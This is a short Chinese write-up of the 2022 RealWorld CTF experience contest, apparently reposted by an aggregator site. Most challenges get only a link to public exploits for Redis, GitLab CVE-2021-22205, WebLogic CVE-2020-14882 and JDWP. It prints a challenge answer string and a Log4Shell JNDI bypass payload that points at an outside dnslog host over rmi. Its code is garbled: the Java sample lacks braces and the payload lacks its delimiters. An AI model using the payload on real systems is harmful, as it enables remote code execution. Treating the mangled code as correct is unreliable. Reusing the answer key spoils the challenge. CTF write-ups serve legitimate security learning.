2022 RealWorld CTF体验赛Writeup
Posted 末 初
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2022 RealWorld CTF体验赛Writeup相关的知识,希望对你有一定的参考价值。
文章目录
- Digital Souvenir
- log4flag
- Be-a-Database-Hacker
- the Secrets of Memory
- baby flaglab
- Flag Console
- Be-a-Database-Hacker 2
- Java Remote Debugger
Digital Souvenir
rwctfRealWorldIsAwesome
log4flag
有一些正则过滤
网上bypass方法很多,随便找一个就行
$$::-jndi:$lower:rmi://vw3nwn.dnslog.cn/exp
Refer:https://cloud.tencent.com/developer/article/1921530
Be-a-Database-Hacker
redis
未授权访问
Refer: https://github.com/n0b0dyCN/redis-rogue-server
the Secrets of Memory
Refer:https://landgrey.me/blog/16/
baby flaglab
Refer:https://github.com/Al1ex/CVE-2021-22205
Flag Console
Refer:https://github.com/backlion/CVE-2020-14882_ALL
Be-a-Database-Hacker 2
Refer:https://blog.csdn.net/qq_36869808/article/details/122426922
Java Remote Debugger
Test.java
import java.lang.Thread;
public class Test
public static void main (String[] args) throws Exception
int i = 0;
while (1 == 1)
Thread.sleep(1000);
System.out.println("" + i);
i += 1;
Java Debug Wire Protocol (JDWP) - Remote Code Execution
Refer:https://security.tencent.com/index.php/blog/msg/137
以上是关于2022 RealWorld CTF体验赛Writeup的主要内容,如果未能解决你的问题,请参考以下文章
[ CTF ] WriteUp-2022年春秋杯网络安全联赛-冬季赛